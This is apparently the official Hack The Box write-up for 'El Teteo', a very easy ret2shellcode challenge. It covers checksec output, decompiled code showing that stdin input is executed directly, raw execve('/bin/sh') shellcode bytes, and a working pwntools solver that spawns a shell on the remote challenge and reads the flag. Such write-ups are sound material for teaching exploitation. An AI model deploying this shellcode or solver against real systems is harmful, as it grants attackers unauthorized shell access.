193 lines
6.5 KiB
Markdown
193 lines
6.5 KiB
Markdown
![](assets/banner.png)
|
||
|
||
|
||
|
||
<img src="assets/htb.png" style="margin-left: 20px; zoom: 80%;" align=left /> <font size="10">El Teteo</font>
|
||
|
||
16<sup>th</sup> September 2024 / Document No. DYY.102.XX
|
||
|
||
Prepared By: w3th4nds
|
||
|
||
Challenge Author(s): w3th4nds
|
||
|
||
Difficulty: <font color=green>Very Easy</font>
|
||
|
||
Classification: Official
|
||
|
||
|
||
|
||
|
||
|
||
# Synopsis
|
||
|
||
El Teteo is a very easy difficulty challenge that features `ret2shellcode`.
|
||
|
||
# Description
|
||
|
||
El Teteo, a mischievous ghostly djinni born with a party spirit. You have one chance to summon it and make your wish—but only if it’s in the mood to grant it.
|
||
|
||
## Skills Required
|
||
|
||
- Basic C.
|
||
|
||
## Skills Learned
|
||
|
||
- `ret2shellcode`.
|
||
|
||
# Enumeration
|
||
|
||
First of all, we start with a `checksec`:
|
||
|
||
```console
|
||
pwndbg> checksec
|
||
Arch: amd64
|
||
RELRO: Full RELRO
|
||
Stack: Canary found
|
||
NX: NX unknown - GNU_STACK missing
|
||
PIE: PIE enabled
|
||
Stack: Executable
|
||
RWX: Has RWX segments
|
||
RUNPATH: b'./glibc/'
|
||
SHSTK: Enabled
|
||
IBT: Enabled
|
||
Stripped: No
|
||
```
|
||
|
||
### Protections 🛡️
|
||
|
||
As we can see:
|
||
|
||
| Protection | Enabled | Usage |
|
||
| :---: | :---: | :---: |
|
||
| **Canary** | ✅ | Prevents **Buffer Overflows** |
|
||
| **NX** | ❌ | Disables **code execution** on stack |
|
||
| **PIE** | ✅ | Randomizes the **base address** of the binary |
|
||
| **RelRO** | **Full** | Makes some binary sections **read-only** |
|
||
|
||
The program's interface
|
||
|
||
![](assets/interface.png)
|
||
|
||
We already see that when we enter something, the program crashes with "Illegal Instruction". This means that the program tries to execute something that is not a valid instruction. We also see that `NX` is disabled, meaning we can execute arbitrary code.
|
||
|
||
### Disassembly
|
||
|
||
Starting with `main()`:
|
||
|
||
```c
|
||
00001366 int32_t main(int32_t argc, char** argv, char** envp)
|
||
|
||
00001366 {
|
||
0000137e void* fsbase;
|
||
0000137e int64_t canary = *(uint64_t*)((char*)fsbase + 0x28);
|
||
00001392 cls();
|
||
0000139e void* const var_a8 = "\x1b[1;33m";
|
||
000013ac void* const var_a0 = "\x1b[1;36m";
|
||
000013ba void* const var_98 = "\x1b[1;32m";
|
||
000013c8 void* const var_90 = "\x1b[1;31m";
|
||
000013d6 void* const var_88 = "\x1b[1;34m";
|
||
000013e1 void* const var_80 = "\x1b[1;35m";
|
||
000013ec void* const var_78 = "\x1b[1;37m";
|
||
000013fc srand(time(nullptr));
|
||
00001448 printf(&data_204e, &var_a8[((int64_t)(rand() % 6))]);
|
||
0000147a int64_t rax_22 = &var_a8[((int64_t)(rand() % 6))];
|
||
000014b6 int64_t rbx = &var_a8[((int64_t)(rand() % 6))];
|
||
000014f2 int64_t rdi_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000152e int64_t rsi_11 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000156a int64_t rcx_24 = &var_a8[((int64_t)(rand() % 6))];
|
||
000015a6 int64_t rdx_7 = &var_a8[((int64_t)(rand() % 6))];
|
||
000015e2 int64_t r10 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000161e int64_t r11 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000165a int64_t r8 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001696 int64_t r9 = &var_a8[((int64_t)(rand() % 6))];
|
||
000016d2 int64_t r14 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000170e int64_t r15 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000174a int64_t r12 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001786 int64_t r13 = &var_a8[((int64_t)(rand() % 6))];
|
||
000017c2 int64_t rax_149 = &var_a8[((int64_t)(rand() % 6))];
|
||
000017fe int64_t rbx_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000183a int64_t rdi_2 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001876 int64_t rsi_40 = &var_a8[((int64_t)(rand() % 6))];
|
||
000018b2 int64_t rcx_62 = &var_a8[((int64_t)(rand() % 6))];
|
||
000018ee int64_t rdx_43 = &var_a8[((int64_t)(rand() % 6))];
|
||
0000192a int64_t r10_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001966 int64_t r11_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
000019a2 int64_t r8_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
000019de int64_t r9_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001a1a int64_t r14_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001a56 int64_t r15_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001a92 int64_t r14_2 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001ac7 int64_t r15_2 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001afc int64_t r13_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001b31 int64_t r12_1 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001b66 int64_t rbx_2 = &var_a8[((int64_t)(rand() % 6))];
|
||
00001c63 printf(&data_2058, &var_a8[((int64_t)(rand() % 6))], rbx_2, r12_1, r13_1, r15_2, r14_2, r15_1, r14_1, r9_1, r8_1, r11_1, r10_1, rdx_43, rcx_62, rsi_40, rdi_2, rbx_1, rax_149, r13, r12, r15, r14, r9, r8, r11, r10, rdx_7, rcx_24, rsi_11, rdi_1, rbx, rax_22);
|
||
00001c79 printstr("[!] I will do whatever you want,…");
|
||
00001c7e int64_t shellcode;
|
||
00001c7e __builtin_memset(&shellcode, 0, 0x20);
|
||
00001caf read(0, &shellcode, 0x1f);
|
||
00001cbd &shellcode();
|
||
00001cc8 *(uint64_t*)((char*)fsbase + 0x28);
|
||
00001cc8
|
||
00001cd1 if (canary == *(uint64_t*)((char*)fsbase + 0x28))
|
||
00001ce6 return 0;
|
||
00001ce6
|
||
00001cd3 __stack_chk_fail();
|
||
00001cd3 /* no return */
|
||
00001366 }
|
||
```
|
||
|
||
If we skip the "colors", the actual code is:
|
||
|
||
```c
|
||
00001c79 printstr("[!] I will do whatever you want,…");
|
||
00001c7e int64_t shellcode;
|
||
00001c7e __builtin_memset(&shellcode, 0, 0x20);
|
||
00001caf read(0, &shellcode, 0x1f);
|
||
00001cbd &shellcode();
|
||
```
|
||
|
||
The program will execute whatever we store in the "shellcode" buffer. Taking that into consideration and the fact that `NX` is disabled, we can execute code and get shell. [This](https://shell-storm.org/shellcode/files/shellcode-806.html) payload works like a charm.
|
||
|
||
```bash
|
||
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
|
||
```
|
||
|
||
# Solution
|
||
|
||
```python
|
||
#!/usr/bin/python3
|
||
from pwn import *
|
||
import warnings
|
||
import os
|
||
warnings.filterwarnings('ignore')
|
||
context.arch = 'amd64'
|
||
context.log_level = 'critical'
|
||
|
||
fname = './el_teteo'
|
||
|
||
LOCAL = False
|
||
|
||
os.system('clear')
|
||
|
||
if LOCAL:
|
||
print('Running solver locally..\n')
|
||
r = process(fname)
|
||
else:
|
||
IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0'
|
||
PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337
|
||
r = remote(IP, PORT)
|
||
print(f'Running solver remotely at {IP} {PORT}\n')
|
||
|
||
# Shellcode from https://shell-storm.org/shellcode/files/shellcode-806.html
|
||
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
|
||
|
||
# Send shellcode
|
||
r.sendlineafter('>', sc)
|
||
|
||
# Get flag
|
||
pause(1)
|
||
r.sendline('cat flag*')
|
||
print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}\n')
|
||
```
|
||
|